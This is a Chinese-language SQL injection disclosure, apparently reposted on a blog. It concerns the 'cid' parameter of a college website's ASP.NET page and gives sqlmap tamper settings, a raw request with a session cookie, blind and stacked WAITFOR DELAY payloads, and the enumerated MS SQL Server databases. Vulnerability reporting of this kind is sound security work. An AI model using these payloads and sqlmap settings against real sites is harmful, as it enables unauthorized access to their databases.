文章出處

http://**.**.**.**/

0x02 詳情

基于時間的布爾盲注

0x03 利用方式
 

sqlmap可測試、加腳本繞過space2comment.py ,另需加--no-cast參數或者--hex



0x04 具體位置
 

collegelinkmanshow.aspx?cid=c3d9872e-d435-4117-8372-dbaad78392eb

注入關鍵字:cid

0x05 HTTP請求頭

 

GET /college/collegelinkmanshow.aspx?cid=c3d9872e-d435-4117-8372-dbaad78392eb HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: ASP.NET_SessionId=yknjna0y33k3p3gokklayfpv; AJSTAT_ok_pages=5; AJSTAT_ok_times=1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*---Place: GETParameter: cid    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cid=c3d9872e-d435-4117-8372-dbaad78392eb') AND 5600=5600 AND ('hSrd'='hSrd    Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries    Payload: cid=c3d9872e-d435-4117-8372-dbaad78392eb'); WAITFOR DELAY '0:0:5'--    Type: AND/OR time-based blind    Title: Microsoft SQL Server/Sybase time-based blind    Payload: cid=c3d9872e-d435-4117-8372-dbaad78392eb') WAITFOR DELAY '0:0:5'-----[09:30:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[09:30:59] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319back-end DBMS: Microsoft SQL Server 2005


數據庫信息

back-end DBMS: Microsoft SQL Server 2005 available databases [6]: [*] may [*] model [*] qsdb [*] tempdb [*] wwwbys [*] wwwbyy

就愛閱讀www.92to.com網友整理上傳,為您提供最全的知識大全,期待您的分享,轉載請注明出處。
歡迎轉載:http://www.kanwencang.com/bangong/20161116/56064.html

文章列表


不含病毒。www.avast.com
arrow
arrow
    全站熱搜
    創作者介紹
    創作者 大師兄 的頭像
    大師兄

    IT工程師數位筆記本

    大師兄 發表在 痞客邦 留言(0) 人氣()